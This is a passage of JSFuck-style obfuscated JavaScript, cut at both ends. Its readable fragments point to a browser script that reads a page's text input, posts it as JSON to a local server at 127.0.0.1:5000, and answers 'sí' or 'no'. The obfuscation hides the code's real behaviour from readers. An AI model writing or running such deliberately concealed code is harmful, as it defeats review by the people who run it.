'+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+가$+나다+나あ+' '+'{'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+가나+う+가$+' '+나다+う+$+(25)[가](30)+가가+い+$+う+' '+'='+' '+あ+(32)[가](33)+あ+나う+가$+' '+나い+う+가$+_+(17)[가](20)+'('+あ+(25)[가](30)+나う+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'5'+'5'+'"'+')')()+나다+가나+','+' '+'{'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+((0)[나]+[])[11]+う+가$+(17)[가](20)+가가+가다+':'+' '+"'"+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'5'+'0'+'"'+')')()+나가+(([]+[])[나]+[])[9]+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'5'+'4'+'"'+')')()+"'"+','+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+(17)[가](20)+う+あ+가다+う+나다+$+':'+' '+'{'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+"'"+[][다][나](나다+う+가$+가あ+나다+い+' '+う+$+_+あ+(25)[가](30)+う+'('+'('+'['+']'+'+'+'['+']'+')'+'['+'"'+$+가あ+나나+'"'+']'+'('+')'+')')()[2]+가가+い+가$+う+い+가$+'-'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'5'+'4'+'"'+')')()+나あ+(25)[가](30)+う+"'"+':'+' '+"'"+あ+(25)[가](30)+(25)[가](30)+가나+나う+_+あ+가$+나う+가가+い+'/'+가_+$+가가+い+"'"+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+'}'+','+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+나나+가가+가다+나あ+':'+' '+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'4'+あ+'"'+')')()+(([]+[])[나]+[])[9]+나가+가い+'.'+$+가$+나다+나う+い+(([]+[])[나]+[])[14]+나う+나い+나あ+'('+'{'+' '+나い+가あ+가나+가나+가$+あ+$+(20)[가](21)+':'+' '+나い+가あ+가나+가나+가$+あ+$+(20)[가](21)+' '+'}'+')'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+'}'+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+가나+う+가$+' '+가다+あ+가$+あ+' '+'='+' '+あ+(32)[가](33)+あ+나う+가$+' '+나다+う+$+(25)[가](30)+가가+い+$+う+'.'+가_+$+가가+い+'('+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+_+가가+い+$+가가+가나+う+'.'+가나+가가+(([]+[])[나]+[])[14]+'('+"'"+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'5'+'1'+'"'+')')()+가あ+う+$+가$+나う+가가+い+':'+"'"+','+' '+나い+가あ+가나+가나+가$+あ+$+(20)[가](21)+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+가나+う+가$+' '+나う+い+(25)[가](30)+가あ+가$+' '+'='+' '+가다+가가+_+가あ+((0)[나]+[])[11]+う+い+가$+'.'+(26)[가](30)+가あ+う+나다+나あ+(([]+[])[나]+[])[9]+う+가나+う+_+가$+가가+나다+'('+"'"+나う+い+(25)[가](30)+가あ+가$+'['+가$+나あ+(25)[가](30)+う+'='+'"'+가$+う+(33)[가](34)+가$+'"'+']'+"'"+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+$+나う+((0)[나]+[])[11]+가あ+가나+あ+가$+う+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'4'+가다+'"'+')')()+가가+가あ+$+う+[][다][나](나다+う+가$+가あ+나다+い+' '+う+$+_+あ+(25)[가](30)+う+'('+'('+'['+']'+'+'+'['+']'+')'+'['+'"'+$+가あ+나나+'"'+']'+'('+')'+')')()[2]+가나+나う+_+(20)[가](21)+'('+나う+い+(25)[가](30)+가あ+가$+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+나い+가あ+い+_+가$+나う+가가+い+' '+나い+나う+(33)[가](34)+'('+가$+う+(33)[가](34)+가$+')'+' '+'{'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+가나+う+가$+' '+가나+가가+(32)[가](33)+う+나다+_+あ+$+う+(([]+[])[나]+[])[9]+가$+나다+나う+い+(([]+[])[나]+[])[14]+' '+'='+' '+가$+う+(33)[가](34)+가$+'.'+가$+가가+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'4'+_+'"'+')')()+가가+(32)[가](33)+う+나다+[][다][나](나다+う+가$+가あ+나다+い+' '+う+$+_+あ+(25)[가](30)+う+'('+'('+'['+']'+'+'+'['+']'+')'+'['+'"'+$+가あ+나나+'"'+']'+'('+')'+')')()[2]+あ+$+う+'('+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+가나+う+가$+' '+_+가나+う+あ+い+う+가다+(([]+[])[나]+[])[9]+가$+나다+나う+い+(([]+[])[나]+[])[14]+' '+'='+' '+가나+가가+(32)[가](33)+う+나다+_+あ+$+う+(([]+[])[나]+[])[9]+가$+나다+나う+い+(([]+[])[나]+[])[14]+'.'+나다+う+(25)[가](30)+가나+あ+_+う+'('+'/'+'['+'^'+あ+'-'+(35)[가](36)+'í'+']'+'/'+(([]+[])[나]+[])[14]+','+' '+"'"+"'"+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+나う+나い+' '+'('+'/'+'('+い+가가+'|'+$+'í'+')'+'$'+'/'+'.'+가$+う+$+가$+'('+_+가나+う+あ+い+う+가다+(([]+[])[나]+[])[9]+가$+나다+나う+い+(([]+[])[나]+[])[14]+')'+')'+' '+'{'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+나다+う+가$+가あ+나다+い+' '+_+가나+う+あ+い+う+가다+(([]+[])[나]+[])[9]+가$+나다+나う+い+(([]+[])[나]+[])[14]+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+'}'+' '+う+가나+$+う+' '+'{'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+나다+う+가$+가あ+나다+い+' '+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'4'+가다+'"'+')')()+あ+가$+(17)[가](20)+'.'+나다+あ+い+가다+가가+((0)[나]+[])[11]+'('+')'+' '+'<'+' '+'0'+'.'+'5'+' '+'?'+' '+"'"+い+가가+"'"+' '+':'+' '+"'"+$+'í'+"'"+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+'}'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+'}'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+_+가가+い+$+가$+' '+나い+나う+(33)[가](34)+う+가다+(([]+[])[나]+[])[9]+가$+나다+나う+い+(([]+[])[나]+[])[14]+' '+'='+' '+나い+나う+(33)[가](34)+'('+가다+あ+가$+あ+'.'+あ+い+$+(32)[가](33)+う+나다+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+가나+う+가$+' '+가$+나あ+(25)[가](30)+う+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'5'+'2'+'"'+')')()+う+$+(25)[가](30)+가가+い+$+う+' '+'='+' '+あ+(32)[가](33)+あ+나う+가$+' '+나い+う+가$+_+(17)[가](20)+'('+"'"+(17)[가](20)+가$+가$+(25)[가](30)+':'+'/'+'/'+'1'+'2'+'7'+'.'+'0'+'.'+'0'+'.'+'1'+':'+'5'+'0'+'0'+'0'+'/'+가$+나あ+(25)[가](30)+う+"'"+','+' '+'{'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+((0)[나]+[])[11]+う+가$+(17)[가](20)+가가+가다+':'+' '+"'"+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'5'+'0'+'"'+')')()+나가+(([]+[])[나]+[])[9]+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'5'+'4'+'"'+')')()+"'"+','+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+(17)[가](20)+う+あ+가다+う+나다+$+':'+' '+'{'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+"'"+[][다][나](나다+う+가$+가あ+나다+い+' '+う+$+_+あ+(25)[가](30)+う+'('+'('+'['+']'+'+'+'['+']'+')'+'['+'"'+$+가あ+나나+'"'+']'+'('+')'+')')()[2]+가가+い+가$+う+い+가$+'-'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'5'+'4'+'"'+')')()+나あ+(25)[가](30)+う+"'"+':'+' '+"'"+あ+(25)[가](30)+(25)[가](30)+가나+나う+_+あ+가$+나う+가가+い+'/'+가_+$+가가+い+"'"+','+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+"'"+([][う+い+가$+나다+나う+う+$]()+[])[8]+_+_+う+$+$+'-'+[][다][나](나다+う+가$+가あ+나다+い+' '+う+$+_+あ+(25)[가](30)+う+'('+'('+'['+']'+'+'+'['+']'+')'+'['+'"'+$+가あ+나나+'"'+']'+'('+')'+')')()[2]+가가+い+가$+나다+가가+가나+'-'+([][う+い+가$+나다+나う+う+$]()+[])[8]+가나+가나+가가+(32)[가](33)+'-'+나가+나다+나う+(([]+[])[나]+[])[14]+나う+い+"'"+':'+' '+"'"+'*'+"'"+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+'}'+','+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+나나+가가+가다+나あ+':'+' '+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'4'+あ+'"'+')')()+(([]+[])[나]+[])[9]+나가+가い+'.'+$+가$+나다+나う+い+(([]+[])[나]+[])[14]+나う+나い+나あ+'('+'{'+' '+나い+나う+(33)[가](34)+う+가다+(([]+[])[나]+[])[9]+가$+나다+나う+い+(([]+[])[나]+[])[14]+':'+' '+나い+나う+(33)[가](34)+う+가다+(([]+[])[나]+[])[9]+가$+나다+나う+い+(([]+[])[나]+[])[14]+' '+'}'+')'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+'}'+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+가나+う+가$+' '+가$+나あ+(25)[가](30)+う+[][다][나](나다+う+가$+가あ+나다+い+' '+う+$+_+あ+(25)[가](30)+う+'('+'['+']'+'['+'"'+다+'"'+']'+')')()[48]+あ+가$+あ+' '+'='+' '+あ+(32)[가](33)+あ+나う+가$+' '+가$+나あ+(25)[가](30)+う+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'5'+'2'+'"'+')')()+う+$+(25)[가](30)+가가+い+$+う+'.'+가_+$+가가+い+'('+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+_+가가+い+$+가가+가나+う+'.'+가나+가가+(([]+[])[나]+[])[14]+'('+가$+나あ+(25)[가](30)+う+[][다][나](나다+う+가$+가あ+나다+い+' '+う+$+_+あ+(25)[가](30)+う+'('+'['+']'+'['+'"'+다+'"'+']'+')')()[48]+あ+가$+あ+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+'}'+' '+_+あ+가$+_+(17)[가](20)+' '+'('+う+나다+나다+가가+나다+')'+' '+'{'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+_+가가+い+$+가가+가나+う+'.'+う+나다+나다+가가+나다+'('+"'"+[][다][나](나다+う+가$+가あ+나다+い+' '+う+$+_+あ+(25)[가](30)+う+'('+'('+'['+']'+'+'+'['+']'+')'+'['+'"'+$+가あ+나나+'"'+']'+'('+')'+')')()[8]+나다+나다+가가+나다+' '+_+あ+가나+가나+나う+い+(([]+[])[나]+[])[14]+' '+([][う+い+가$+나다+나う+う+$]()+[])[8]+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'5'+'0'+'"'+')')()+가う+':'+"'"+','+' '+う+나다+나다+가가+나다+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+'}'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+'}'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+'}'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+あ+(32)[가](33)+あ+나う+가$+' '+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'5'+'4'+'"'+')')()+나う+((0)[나]+[])[11]+う+'.'+$+가나+う+う+(25)[가](30)+'('+'3'+'0'+'0'+'0'+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+나う+나い+' '+'('+나う+$+'_'+い+가가+가$+$+가가+가나+([][다]+[])[23]+う+가다+'('+')'+')'+' '+'{'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+나다+う+(25)[가](30)+う+あ+가$+[][다][나](나다+う+가$+가あ+나다+い+' '+う+$+_+あ+(25)[가](30)+う+'('+'('+'['+']'+'+'+'['+']'+')'+'['+'"'+$+가あ+나나+'"'+']'+'('+')'+')')()[2]+가가+가あ+い+가$+' '+'='+' '+'1'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+'}'+' '+う+가나+$+う+' '+'{'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+나다+う+(25)[가](30)+う+あ+가$+[][다][나](나다+う+가$+가あ+나다+い+' '+う+$+_+あ+(25)[가](30)+う+'('+'('+'['+']'+'+'+'['+']'+')'+'['+'"'+$+가あ+나나+'"'+']'+'('+')'+')')()[2]+가가+가あ+い+가$+' '+'='+' '+'0'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+'}'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+'}'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+'}'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+나い+가あ+い+_+가$+나う+가가+い+' '+$+가あ+나나+((0)[나]+[])[11]+나う+가$+'('+')'+' '+'{'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+가$+나다+나あ+' '+'{'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+$+나う+((0)[나]+[])[11]+가あ+가나+あ+가$+う+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'4'+가다+'"'+')')()+가가+가あ+$+う+[][다][나](나다+う+가$+가あ+나다+い+' '+う+$+_+あ+(25)[가](30)+う+'('+'('+'['+']'+'+'+'['+']'+')'+'['+'"'+$+가あ+나나+'"'+']'+'('+')'+')')()[2]+가나+나う+_+(20)[가](21)+'('+가다+가가+_+가あ+((0)[나]+[])[11]+う+い+가$+'.'+(26)[가](30)+가あ+う+나다+나あ+(([]+[])[나]+[])[9]+う+가나+う+_+가$+가가+나다+'('+"'"+'.'+나나+가あ+가$+가$+가가+い+'-'+$+가あ+나나+((0)[나]+[])[11]+나う+가$+"'"+')'+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+'}'+' '+_+あ+가$+_+(17)[가](20)+' '+'('+う+')'+' '+'{'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+_+가가+い+$+가가+가나+う+'.'+う+나다+나다+가가+나다+'('+"'"+[][다][나](나다+う+가$+가あ+나다+い+' '+う+$+_+あ+(25)[가](30)+う+'('+'('+'['+']'+'+'+'['+']'+')'+'['+'"'+$+가あ+나나+'"'+']'+'('+')'+')')()[8]+나다+나다+가가+나다+' '+$+가あ+나나+((0)[나]+[])[11]+나う+가$+가$+나う+い+(([]+[])[나]+[])[14]+"'"+','+' '+う+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+'}'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+'}'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+あ+$+나あ+い+_+' '+나い+가あ+い+_+가$+나う+가가+い+' '+가가+い+'_'+(32)[가](33)+나う+가다+(([]+[])[나]+[])[14]+う+가$+'_'+나い+나다+あ+((0)[나]+[])[11]+う+'('+')'+' '+'{'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+あ+(32)[가](33)+あ+나う+가$+' '+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'5'+'4'+'"'+')')()+나う+((0)[나]+[])[11]+う+'.'+$+가나+う+う+(25)[가](30)+'('+'5'+'0'+'0'+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+あ+(32)[가](33)+あ+나う+가$+' '+가가+(25)[가](30)+う+い+'_'+나う+((0)[나]+[])[11]+あ+(([]+[])[나]+[])[14]+う+'_'+나い+나다+あ+((0)[나]+[])[11]+う+'('+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+'}'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+あ+$+나あ+い+_+' '+나い+가あ+い+_+가$+나う+가가+い+' '+가가+い+'_'+나う+((0)[나]+[])[11]+あ+(([]+[])[나]+[])[14]+う+'_'+나い+나다+あ+((0)[나]+[])[11]+う+'('+')'+' '+'{'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+나う+나い+' 